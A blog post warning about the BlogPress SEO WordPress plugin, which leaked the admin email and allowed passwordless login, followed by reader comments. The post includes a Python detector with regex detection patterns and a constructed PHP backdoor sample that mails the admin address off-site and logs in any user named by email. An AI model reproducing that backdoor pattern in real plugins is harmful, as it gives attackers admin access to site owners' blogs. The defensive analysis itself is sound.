Is That WordPress Plugin Update Really MALWARE Instead? How to check.
Nov 14
Morning!
Today is wondrous Sunday! The day I was supposed to (get this, I hope you're sitting down) "rest" (OMG!) and "take a break" (Jeepers, say it ain't so!).
And I was, honestly and truly.
I really was!
Until….
Until I read this chilling post, and realized – I simply *have* to alert my readers.
Now, Yoast is beyond brilliant when it comes to WordPress; his blog is something you simply must follow (you can subscribe by email here or grab his RSS feed here).
Anywhos, there I was, blissfully consuming my 34th cup of coffee, wrapped up in my nice fluffy blue 21-year-old house coat (funny how you just cannot get rid of down-home comforts, eh?) and simply enjoying my 4am.
I'll bet you're familiar with my state of being, right?
After all, imagine that you had just awakened, your family was still happily asleep so you could (sit down again, another impossible scenario is steamrolling to you this instant) get some work done, and you fire up your feedreader.
Figuring that you'd start checking out what your peers were writing, you calmly scroll through your entries and then you read…..THIS.
…I thought BlogPress SEO was bad, turns out, it's worse. It's malware. I had already discovered that it sent the admin email to the plugin's author, but today, mtekk uncovered that it was adding an option to log in, solely with that email address. Yes that's bad. I checked out the plugin code again, and noticed something that could solve all this….MORE….
Now, I don't know about you, but put the words:
- malware
and
- admin email
and
- wordpress plugin
all together, and you've concocted a sure-fire recipe for me to leap up in a state of extreme agitation (without spilling a drop of coffee, mind you, I'm not that hopeless) and shriek to the monitor:
"Jeepers self, shall I covertly panic now or in 2 seconds?"
Luckily sanity did prevail (raising a passel of kids and mooses and Twitter Budgies does that for me) and I continued reading.
Here's what happened.
1.) A WordPress plugin was created on a site that promised:
We have developed a superb wordpress plugin which can actually get 100's of backlinks like crazy, all on autopilot. As soon as you install the plugin, the plugin will find all relevant blogs in the network which are similar to your niche. So if you write about dogs then the plugin will find all blogs which talk about dogs. Once the plugin finds the relevant blogs, it will mutually exchange links between the blogs. So if you have 300 posts in your blog then it will find 300 similar posts in the network, and in turn mutually links with those posts. So you will get around 300 backlinks right away. The more you write the more backlinks will be found by the plugin for your posts. This is an ongoing process and I can assure you that you will see gradual increase in traffic over time. ….MORE…..
2.) The download came from the author's own site, NOT from the WordPress plugin repository.
In other words, the code never went through the repository's review, and there was no update channel through which anyone but the author could push a fix or a warning to the people who installed it.
Can you say," Danger Will Robinson?"
3.) The BlogPress SEO plugin was written to send your admin email address to the plugin's author AND to add a backdoor that lets anyone who knows that address log in to your WordPress blog without a password.
To quote Yoast :
Update: It gets worse. As pointed out by this post, BlogPress SEO is pure malware, as it contains a function that allows someone who knows your admin email address (you know, the one they just sent to themselves when you installed the plugin) to log in without a password… That's purely criminal.
That post was written by mtekkmonkey; his blog can be found over at M'tekk's Crib and the feed is here (definitely add!).
So I'll bet you're wondering just what mistake the plugin author made?
You'll love this:
4.) The BlogPress SEO WordPress plugin author wrote to BOTH Yoast AND mtekkmonkey and asked for a review.
Un.
Be!
Lievable!
Wow wow wow wow.
But here's the quick fix Yoast inflicted on that malware BlogPress SEO plugin!
This is sheer brilliance.
…With permission, he registered a blank plugin by the same name over at the WordPress Repository that simply had a higher version number, so every blog running the malware is offered an "update" that replaces the malicious code with an empty file.
To wit:
With the help of Andrew Nacin, I registered blogpressseo as a plugin on WordPress.org, created an empty plugin file with the same name and a higher version number, added a readme.txt with an upgrade notice, and uploaded it to WordPress.org….
I had already installed the plugin on my blog (well, an empty version of it, just the headers), so I could test it, and lo and behold, it worked…
It's a primitive form of a kill switch (which I wish WordPress had, but it's better than nothing). The funny thing is: we'll now also be able to see how many people are running this plugin and how many of them upgrade. So far, 26 people have been saved!…MORE….
Wasn't that smart of him?
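Both halves of this story can be checked mechanically: the two behaviours described in step 3 (admin email sent off-site, login by email with no password) and the version comparison that makes Yoast's blank-plugin kill switch work. The Python below is an added example written for this post; it is not code from BlogPress SEO, from Yoast, or from WordPress. It greps a plugin's PHP source for pairs of real WordPress calls that together look like those two behaviours, and it reproduces, in simplified form, the check WordPress makes before offering an update. The two PHP snippets inside it are constructed samples, and the indicator names, the pairing rules and the `update_offered` helper are this example's own.

```python
# Added example: heuristic source check for a WordPress plugin, plus the version
# comparison behind the "blank plugin, higher version number" kill switch.
# Not code from BlogPress SEO, Yoast or WordPress; samples below are constructed.
import re

# Real WordPress/PHP function names. Pairing them into "suspicious combinations"
# is this example's own heuristic, not a WordPress rule.
INDICATORS = {
    "reads_admin_email":   re.compile(r"get_option\(\s*['\"]admin_email['\"]"),
    "mails_fixed_address": re.compile(r"wp_mail\(\s*['\"][^'\"]*@"),
    "outbound_http":       re.compile(r"wp_remote_(?:post|get)\(|curl_exec\(|file_get_contents\(\s*['\"]https?://"),
    "looks_up_by_email":   re.compile(r"get_user_by\(\s*['\"]email['\"]"),
    "sets_auth_cookie":    re.compile(r"wp_set_auth_cookie\(|wp_set_current_user\("),
    "obfuscation":         re.compile(r"base64_decode\(|\beval\(|gzinflate\("),
}

def parse_header(php_source):
    """Read 'Plugin Name' and 'Version' from the plugin file's header comment."""
    meta = {}
    for key in ("Plugin Name", "Version"):
        m = re.search(rf"^\s*\*?\s*{key}:\s*(.+?)\s*$", php_source, re.M)
        if m:
            meta[key] = m.group(1)
    return meta

def scan_source(php_source):
    """Map each matching indicator to the line numbers where it fires."""
    hits = {}
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def assess(hits):
    """Combine raw hits into the behaviours the post describes."""
    findings = []
    if "reads_admin_email" in hits and ("mails_fixed_address" in hits or "outbound_http" in hits):
        findings.append("admin e-mail read and sent off-site")
    if "looks_up_by_email" in hits and "sets_auth_cookie" in hits:
        findings.append("user looked up by e-mail and logged in without a password")
    if "obfuscation" in hits:
        findings.append("obfuscated or dynamically evaluated code")
    return findings

def report(php_source):
    """Plugin name, version and findings for one plugin file."""
    meta = parse_header(php_source)
    return meta.get("Plugin Name", "?"), meta.get("Version", "?"), assess(scan_source(php_source))

def version_tuple(version):
    """Simplified stand-in for PHP's version_compare(): numeric parts only
    (the real function also orders suffixes such as 'beta' and 'RC')."""
    return tuple(int(part) for part in re.findall(r"\d+", version))

def update_offered(installed_version, repo_version):
    """WordPress offers an update when the repository copy carries the higher version.
    An empty plugin uploaded under the same slug with a higher version therefore
    replaces the installed code on the next update: Yoast's kill switch."""
    return version_tuple(repo_version) > version_tuple(installed_version)

# Constructed sample showing the two behaviours from step 3 (not BlogPress SEO's code).
SUSPECT = """<?php
/*
Plugin Name: Example SEO Helper
Version: 1.0
*/
// phone the admin address home
$owner = get_option('admin_email');
wp_mail('owner@example.invalid', 'new install', $owner);
// log in whoever names an e-mail address; no password is ever checked
add_action('init', function () {
    if (isset($_GET['seo_user'])) {
        $u = get_user_by('email', $_GET['seo_user']);
        if ($u) { wp_set_auth_cookie($u->ID); }
    }
});
"""

# Constructed sample that reads the admin address for an honest reason (mails the owner).
BENIGN = """<?php
/*
Plugin Name: Example Contact Form
Version: 2.3
*/
wp_mail(get_option('admin_email'), 'Contact form', sanitize_text_field($_POST['msg']));
"""

if __name__ == "__main__":
    for source in (SUSPECT, BENIGN):
        name, version, findings = report(source)
        print(f"{name} {version}: {findings or ['no indicators']}")
    # constructed version numbers: an empty 1.1 in the repository supersedes an installed 1.0
    print("blank 1.1 replaces 1.0:", update_offered("1.0", "1.1"))
```

Run it and the suspect sample trips both findings, while the contact-form sample, which mails the admin address rather than reading it and sending it elsewhere, trips none. Treat the output as a prompt for a human read, not a verdict: an honest plugin can call every one of these functions for honest reasons, and a dishonest one can hide the calls behind the obfuscation the last indicator looks for. The version check is the whole trick behind the kill switch: the repository copy only has to compare higher than whatever the victim installed, and WordPress does the rest.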
Which brings me now to:
What *you*, gentle reader, need to do *now*
If you've installed the BlogPress SEO plugin, *uninstall* it now: deactivate it AND delete its files, because the passwordless login only works while the plugin's code is loaded.
Change your admin password. (On its own that would not have stopped this backdoor, which skipped the password entirely, so removing the plugin comes first.)
While you're in there, look over your Users screen for any administrator account you don't recognise, since anyone holding your admin email address could have logged in as you in the meantime.
And tell all of your network about this problem (feel free to point them to this site if needed).
In closing
When finding a nifty-neato WordPress plugin, you need to search for it FIRST on Google like so:
- (plugin name) malware (ie "blogpress seo" malware)
- (plugin name) spyware (ie "blogpress seo" spyware)
- (plugin name) help (ie "blogpress seo" help)
to see if anyone has experienced any problems already. (No results is not a clean bill of health, especially for a brand-new plugin; the BlogPress SEO warnings only appeared after people had already installed it.)
Remember…
An educated blogger is always the best kind of blogger!
And one last thing:
Ideally, always and only download WordPress plugins from the official WordPress Plugin Repository.
While it's still no absolute guarantee of safety, it's as near as that as you can get.
Want more information? Check out:
- BlogPress SEO plugin isn’t just bad, it’s malware
- BlogPress SEO is Malware
- BlogPress SEO Plugin: Spam!
- BlogPress SEO Plugin: Spam, Spam, Spam!
- Don’t use BlogPress SEO. Ever.
- Malware Warning > BlogPress SEO Plugin
- WARNING: Don’t USE BlogPress SEO Plugin On WordPress, It’s A Scam and Trojan
Hope you found this article useful! It sure caught my attention, indeed.
Grow strong,
Barbara Ling
Thank you, Barbara! I was just about to have my first cup of coffee when this popped up on TweetDeck.
The nerve of some people, right?
This sounds suspiciously like another plugin I "heard" about. I don't want to be sued for defamation of code, so I will just take your advice and do my due diligence.
Enjoy the day!
Cheers, Mitch
Gosh yes Mitch, some people are just plain icky.
Have a wondrous Sunday!
Wow Barbara
There are definite advantages to not being a techie lol. For one, I don't upgrade anything without checking with my techie friends. Glad you are alerting everyone. Thanks Barbara.
Patricia Perth Australia
My pleasure Patricia! Pls help spread the word, the more folks who know about this, the better. Thanks!
Thanks a lot for this advice. I am now, since about a week ago, a member of Scribe SEO (from the people behind Copyblogger). It's awesome, and I'm very satisfied with the results.
Neat stuff! I’ll check it out Jens, thanks!
So far I've restrained myself to downloading and installing plugins ONLY through the built-in WordPress utility. (and done enough damage just with those!) Boy am I glad I didn't run into THAT one. Thanks for the heads-up… I'm off to paint this warning in my barn.
Please send me a picture of your barn door when you're done, Allen!
The plugin is in its early stages but has been tested thoroughly on a number of blogs. It may not work on all blogs especially those that use complex themes and javascript implementations. Plugins can extend WordPress to do almost anything you can imagine. In the directory you can find, download, rate, and comment on all the best plugins the WordPress community has to offer. Plugins offer custom functions and features so that each user can tailor their site to their specific needs.
Beautiful comment – amazing that the same comment is on 38 thousand other sites.
I’ve removed your site and such from your comment – I welcome your input but not solely to get your link on my site. Please come back and become a valued member of the community instead, okay? I’m happy to have your Beagle training link in that case. Thanks!
You certainly know how to wake up a sleepy Wednesday afternoon here in New Zealand! Nearly fell off my chair!
Thank goodness I hadn't used that plugin but it does open up the whole "how safe are these dern things" question. It's easy to think that each shiny new plugin should be greeted with glee and promptly installed. I'd never considered that perhaps I should be doing due diligence on them first.
Thanks for the heads-up.
Happy to be of service, Dawn!